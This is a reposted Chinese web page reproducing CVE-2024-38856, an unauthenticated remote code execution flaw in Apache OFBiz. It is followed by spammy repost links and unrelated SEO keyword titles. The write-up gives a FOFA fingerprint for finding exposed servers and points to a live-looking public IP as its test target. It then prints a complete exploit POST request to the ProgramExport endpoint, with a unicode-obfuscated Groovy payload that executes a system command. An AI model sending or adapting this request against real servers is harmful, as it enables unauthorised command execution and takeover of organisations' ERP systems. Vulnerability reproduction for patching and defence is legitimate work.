当前位置: 首页 > wzjs >正文

秦皇岛手机网站建设wordpress主题站

秦皇岛手机网站建设,wordpress主题站,南京360推广 网站建设,网站建设与管理中专专业【漏洞复现】CVE-2024-38856(ApacheOfbiz RCE) 1. 漏洞描述 Apache OFBiz 是一个开源的企业资源规划(ERP)系统。它提供了一套企业应用程序,用于集成和自动化企业的许多业务流程。 这个漏洞是由于对 CVE-2023-51467 的…

【漏洞复现】CVE-2024-38856(ApacheOfbiz RCE)

1. 漏洞描述

Apache OFBiz 是一个开源的企业资源规划(ERP)系统。它提供了一套企业应用程序,用于集成和自动化企业的许多业务流程。 这个漏洞是由于对 CVE-2023-51467 的不完全修复而产生的。在 Apache OFBiz 18.12.11 版本中,开发人员认为他们已经修复了该漏洞,但实际上他们只解决了其中一种利用方法。Groovy 表达式注入仍然存在,允许未经授权的用户在服务器上执行任意命令。

2. 影响版本

Apache OFBiz <= 18.12.14

3. 服务探测指纹

FOFA:app=“Apache_OFBiz”

4. 复现过程

https://101.200.198.105:24599/webtools/control/checklogin
[图片]
[图片]

exp

POST /webtools/control/main/ProgramExport HTTP/1.1
Host: 127.0.0.1:8443
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 272groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u006c\u0063\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003b

unicode编码的在线网站:https://tool.chinaz.com/tools/unicode.aspx

\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u006c\u0063\u0027\u002e\u0065\u0078\u0065\u0063\u0075\u0074\u0065\u0028\u0029\u002e\u0074\u0065\u0078\u0074\u0029\u003bthrow new Exception('calc'.execute().text);进行编码后的数据


文章转载自:

http://SS3cbPCh.jgcyn.cn
http://yNRinbVK.jgcyn.cn
http://s4ALv5AB.jgcyn.cn
http://5BOXl9d1.jgcyn.cn
http://pI9B6lP3.jgcyn.cn
http://ZmJDaGRs.jgcyn.cn
http://EpI9NecT.jgcyn.cn
http://r2GmzZtj.jgcyn.cn
http://csB6ZCc5.jgcyn.cn
http://3xVeXKGo.jgcyn.cn
http://zc3nWSBp.jgcyn.cn
http://3i2k0BUR.jgcyn.cn
http://3sPcCtpl.jgcyn.cn
http://4NDVxWsx.jgcyn.cn
http://JAGaZL2J.jgcyn.cn
http://0u6pcqph.jgcyn.cn
http://5LCrBF0s.jgcyn.cn
http://BhKgNFad.jgcyn.cn
http://8LOvF2du.jgcyn.cn
http://lUZKfxYz.jgcyn.cn
http://bPhWUE3I.jgcyn.cn
http://jAWgARsL.jgcyn.cn
http://WZH7nmFg.jgcyn.cn
http://SN3ofV3K.jgcyn.cn
http://UkmVtSg7.jgcyn.cn
http://VHORHagB.jgcyn.cn
http://nDvkvrJ9.jgcyn.cn
http://VKk6HV53.jgcyn.cn
http://WBGH1ann.jgcyn.cn
http://6g52ih6R.jgcyn.cn
http://www.dtcms.com/wzjs/683086.html

相关文章:

  • 如何做域名网站做网站主流网站
  • 叫别人做网站后怎么更改密码花都定制型网站建设
  • 商城网站用html做时尚女装网站模版
  • 建设银行网站能买手机wordpress主题 手机
  • 江西那家做网站公司好福州论坛建站模板
  • 网站设计与开发的基本步骤包括哪些?网站开发先找UI吗
  • 一站式装修公司排名网站没有域名
  • 谷歌外贸建站中国建设银行网站怎么登录不上去
  • 网站 购买网站论坛怎样建设
  • 惠州网站建设教程p2vr做的网站怎么再次打开
  • 做的比较好看的国内网站敬请期待还是说尽情期待
  • 做app要不要建网站佳木斯城乡建设局官方网站
  • 餐饮网站开发背景佛山建站怎么做
  • 做网站卖东西赚钱么群晖可以做网站吗
  • 采购网站建设伊春seo公司
  • 建筑设计专业的网站快速提高网站流量
  • 做铝材的网站小程序拉新项目
  • 简述网站开发工作流程室内设计联盟 官网
  • 做一个网站放网上要多少钱北京网络建设公司
  • 郑州哪里有做网站的外贸营销邮件范文
  • 关于建设 网站的请示怎样做网站的ico图片
  • 做学校网站的目的是什么修改wordpress上传图片路径
  • 石家庄网站建设工作室wordpress安装后优化
  • 百度网站前三名权重一般在多少网站后台建设内容
  • 广州企业网站模板建站东莞seo按天计费
  • 罗湖网站建域名解析到别人网站
  • 厦门专业网站营销html网页制作基础知识
  • 服装网站建设准备做网站的windowlcd
  • 如何用两个版本的wordpress站长工具seo综合查询pc
  • asp网站开发教案要想让别人网站卖我的东西怎么做